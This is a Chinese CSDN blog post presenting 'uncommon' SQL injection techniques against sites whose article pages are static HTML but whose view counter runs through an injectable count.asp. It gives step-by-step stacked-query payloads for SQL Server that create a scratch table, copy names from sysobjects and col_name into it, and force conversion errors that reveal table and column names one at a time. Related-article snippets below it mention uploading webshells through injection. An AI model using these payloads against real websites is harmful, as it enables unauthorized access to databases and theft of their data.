SQL脚本注入的不常见方法概括!

最新推荐文章于 2024-08-08 14:37:33 发布
最新推荐文章于 2024-08-08 14:37:33 发布
阅读量430 收藏 1
点赞数
分类专栏: SQL 文章标签: sql 脚本 sqlserver 服务器 object 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fwqkey/article/details/2925177
版权

 

 大家在是否碰到过这样的站点,全站文章系统采用FSO静态生成的HTML文件来显示。这样做的好处一来可以减轻服务器负担,提高访问速度。二来也阻止了SQL注入式的攻击。

我来说说他们的文章系统原理:全部文章均在数据库存有一个副本。另处根据模板生成一个HTML页面。

  攻击方法: 查看源文件/看里面是否有通过JS来调用的页面。如调用来更新文章的浏览次数。

  我们就可以这样来试一下可否注入: http://服务器域名/count.asp?id=1552’

  看一下是否出错。如出错说明有注入漏洞。然后正常攻击。

  在本机建立一下post.htm的文件和log.txt的文本文件(用来记录用,这是一个好习惯)

  post.htm内容:主要是方便输入。

  对于SQLSERVER的服务器可以这样判断:在1552后加一分号,如正常有可能是SQLSERVER

  对于这类数据库可以先建一个表id=1552;create table aaa(aaa char(20));--

  然后插入一条记录:id=1552;insert into aaa values(’test’);--

  再之后枚举出他的数据表名:

  id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype=’u’ and status>0);--

  这是将第一个表名更新到aaa的字段处。

id=1552 and exists(select * from aaa where aaa>5)就会报错,多数情况会将表名直接读出:

  1.  Microsoft OLE DB Provider for SQL Server 错误 ’80040e07’ 
  3.   将 varchar 值 ’vote’ 转换为数据类型为 int 的列时发生语法错误。 
  5.   /search.asp,行21 

其中vote就是表名:

  也可以先猜出一个表名,再把(select top 1 name from sysobjects where xtype=’u’ and status>0)的值更新到那个表的一条记录中去。通过网页显示。

  读出第一个表,第二个表可以这样读出来(在条件后加上 and name<>’刚才得到的表名’)。

  id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype=’u’ and status>0 and name<>’vote’);--

  然后id=1552 and exists(select * from aaa where aaa>5)

  读出第二个表,^^^^^^一个个的读出,直到没有为止。

  读字段是这样:

  id=1552;update aaa set aaa=(select top 1 col_name(object_id(’表名’),1));--

  然后id=1552 and exists(select * from aaa where aaa>5)出错,得到字段名

  id=1552;update aaa set aaa=(select top 1 col_name(object_id(’表名’),2));--

  然后id=1552 and exists(select * from aaa where aaa>5)出错,得到字段名

  ……类推

fwqkey
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL 手工注入 变形上传拿shell
10-21
SQL 手工注入 变形上传拿shell 上传分析
sql脚本注入的不常见方法概括
11-08
标题与描述均提到了“SQL脚本注入的不常见方法”,这一主题聚焦于探讨在网络安全领域内,利用SQL脚本进行攻击的一些非常规手段。SQL注入是黑客常用的攻击方式之一,通过将恶意的SQL代码插入到数据库查询语句中,以...
ORA-600 16703--oracle介质被注入恶意脚本
weixin_30417487的博客
11-26 687
继续上篇的tab$被清空(ORA-600 16703故障解析—tab$表被清空),导致数据库启动异常的caseORA-600 16703报错 数据库日志分析数据库open成功同时报ORA-7445 kokeicbegin和ORA-600 kzrini:!uprofile错误 再次启动数据库直接报ORA-600 16703错误 这里有一个其他现象,就是数据库在open成功的同时(同...
sql语句数据库执行快,但是程序执行慢的情况(已解决)
热门推荐
qq_44004908的博客
06-01 1万+
最近在项目里遇到个问题,带日期的查询特别慢,但是语句单独提出来在数据库查询却是非常快。同样的条件,数据库查询出来三秒,程序里调试发现,需要20来秒。 SimpleDateFormat format = new SimpleDateFormat("yyyy-MM-dd"); map.put("startTime",format.parse(startTime)); map.put("endTime",format.parse(endTime)); 这是优化后的代码,前台传递过来的startTim
SQL注入上传一句话木马
buffedon的博客
05-31 9292
利用sql注入上传一句话木马导读1. sql注入的危害2. 文件写入2.1 webshell和一句话木马webshell(大马)一句话木马木马文件的危害2.2 文件写入的前提条件2.3 写入函数2.4 怎么找网站根目录(绝对路径)2.5 只能与回显注入结合2.6 日志写文件2.7 文件读取前提条件读取函数2.8 针对文件写入的防护 导读 本文主要介绍了利用sql漏洞上传文件的一些知识。在利用sql注入漏洞上传文件的时候我们需要知道 被上传的网页 在web服务器的路径 上传文件要获取哪些权限,也就是有哪些前
SQL脚本注入
heibaikong6的博客
09-08 2110
条件 当SQL注入时没有显示输出,也没有报错输出;但是在每个网页打开时,都会将输入的语句写入到一个文件中。 思路 利用上述条件可以将输入的sql语句写成一个一句话木马通过访问网站将一句话木马写入到后端文件中,进而通过中国菜刀进行进一步控制 步骤 依旧进行试验,得到闭合 测试列数 找到路径 写入木马(一定要找到具有写的权限的路径) 利用中国菜刀进行控制 进入网页所在的服务器 得到数据 一句话木...
SQL脚本注入的不常见方法概括
顾丽江的专栏
04-17 429
我来说说他们的文章系统原理:全部文章均在数据库存有一个副本。另处根据模板生成一个HTML页面。   攻击方法: 查看源文件/看里面是否有通过JS来调用的页面。如调用来更新文章的浏览次数。   我们就可以这样来试一下可否注入: http://服务器域名/count.asp?id=1552’   看一下是否出错。如出错说明有注入漏洞。然后正常攻击。   在本机建立一下post.htm的
day27WEB攻防-通用漏洞&SQL注入&常见SQL注入类型&Tamper脚本的使用
m0_69583059的博客
01-18 1468
如果在实战中我们遇到了这样的问题应该如何解决,这里我们可以采用宽字节绕过,就是借助一些繁体字符或者乱码字符来占用字节位数,从而尝试绕过,例如,如果对单引号'进行了转义,我们可以通过在单引号前面加上%df来占用转义符号,没有了转义字符传入的数据就是正常的了。开发程序里面,数字不需要单引号,字符需要单引号,双引号去概括的,在注入的时候,需要考虑到符号的闭合,才能正确去执行SQL,完成注入。在注入的过程中,会遇到一些复杂的注入(waf绕过,过滤,编码等),tamper脚本可以尝试绕过。
SQL注入-干货!干货!
rumil的博客
08-20 332
SQL注入小总结~
SQL注入基础入门篇 注入思路及常见SQL注入类型总结
好好睡觉
03-04 7096
SQL注入基础部分、注入脚本常见注入类型分类、报错注入、联合查询思路
脚本渗透系列教程
05-06
通过编写Perl脚本实现对Web应用的自动SQL注入攻击,展示如何识别并利用常见SQL注入漏洞。 - **案例3:Bash脚本在Linux系统后门创建中的应用**。讲解如何使用Bash脚本在目标Linux系统上创建隐蔽的后门通道,以便于...
SQL Injection Attacks and Defense, 2nd Ed
03-21
- **SQL注入测试方法**:讲解如何在Web应用程序中寻找潜在的SQL注入点。 - **确认SQL注入**:介绍技术手段,用以验证发现的潜在注入点是否真实存在。 - **自动化发现**:讨论自动化工具在SQL注入检测中的应用,提高...
ASP网络硬盘文件资源管理系统(源代码+论文+开题报告+答辩PPT+外文翻译).rar
11-08
6. **安全性**:考虑到文件资源管理系统的敏感性,项目可能涉及数据加密、防止SQL注入、跨站脚本攻击(XSS)等安全措施。ASP.NET提供了多种内置的安全机制,如AntiForgeryToken、Validation Summary等,以保护用户...
护网面试题总结+DD安全工程师笔试问题
10-14
知识点:OWASP Top10 是一个安全风险排名,包括 SQL 注入、失效的身份认证、敏感数据泄露、XML 外部实体(XXE)、失效的访问控制、安全配置错误、跨站脚本(XSS)、不安全的反序列化、使用含有已知漏洞的组件、不足...
SQL 登录注入脚本_常见web安全问题,SQL注入、XSS、CSRF,基本原理以及如何防御...
weixin_39774491的博客
11-20 240
1.SQL注入原理:1).SQL命令可查询、插入、更新、删除等,命令的串接。而以分号字元为不同命 令的区别。(原本的作用是用于SubQuery或作为查询、插入、更新、删除……等 的条件式)2).SQL命令对于传入的字符串参数是用单引号字元所包起来。(但连续2个单引 号字元,在SQL资料库中,则视为字串中的一个单引号字元)3).SQL命令中,可以注入注解预防:1).在设计应用程序时,完全使用参数化查...
kubernetes集群部署sql server数据库服务
最新发布
jiang0615csdn的博客
08-08 456
kubernetes集群部署sql server数据库服务
dbeaver 导入sql 报错,ERROR 2059 (HY000)
hyq_07_27的博客
08-07 255
ERROR 2059 (HY000): Authentication plugin ‘caching_sha2_password’ cannot be loaded: 鎵句笉鍒版寚瀹氱殑妯″潡銆�。下载后解压压缩包,点击“添加数据库地址”按钮,选择新的MySQL8的所在目录.再次导入就可以了。可以下载 MySQL免安装版配置教程mysql-8.0.39-winx64.zip。先mysql连接设置,查看一下dbeaver的mysql 版本,是5.5.62.版本问题,MySQL8之后更换了密码认证策略。
QSqlQueryModel与QSqlTableModel查询数据库
weixin_39688581的博客
08-08 203
项目中需要对数据进行查询与展示,数据量不大,使用的是sqlite数据库,将使用过程记录如下。
常见sql注入防御方法
06-13
SQL注入是一种常见的网络安全威胁,攻击者通过输入恶意SQL代码来操纵数据库。为防止SQL注入,开发者可以采用多种策略和技术来保护应用程序。以下是一些常见SQL注入防御方法: 1. **参数化查询(Parameterized Queries)**:这是最有效的防御手段之一,它将SQL语句中的用户输入作为参数传递给查询,而不是直接拼接到SQL文本中。这样可以避免解析器执行恶意代码。 2. **预编译语句(Prepared Statements)**:类似参数化查询,数据库会预先编译查询语句,然后多次使用,每次传入不同的参数值。 3. **输入验证和过滤**:对用户输入进行严格的检查和格式验证,确保它们符合预期的数据类型和模式,移除特殊字符或转义特殊SQL字符。 4. **使用存储过程(Stored Procedures)**:存储过程在服务器端执行,减少了直接暴露在用户输入下的SQL代码,提高了安全性。 5. **输入长度限制**:设置合理的输入长度限制,防止恶意长字符串导致的SQL注入。 6. **错误处理和信息隐藏**:不向用户显示详细的错误信息,这可能包含数据库结构或敏感数据,攻击者可通过这些信息构造注入语句。 7. **使用ORM(Object-Relational Mapping)框架**:这些框架通常处理SQL查询的细节,提供了一定程度的安全性。 8. **启用数据库SQL注入防御功能**:例如,MySQL的`EXTRA`信息或某些数据库系统的参数设置。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值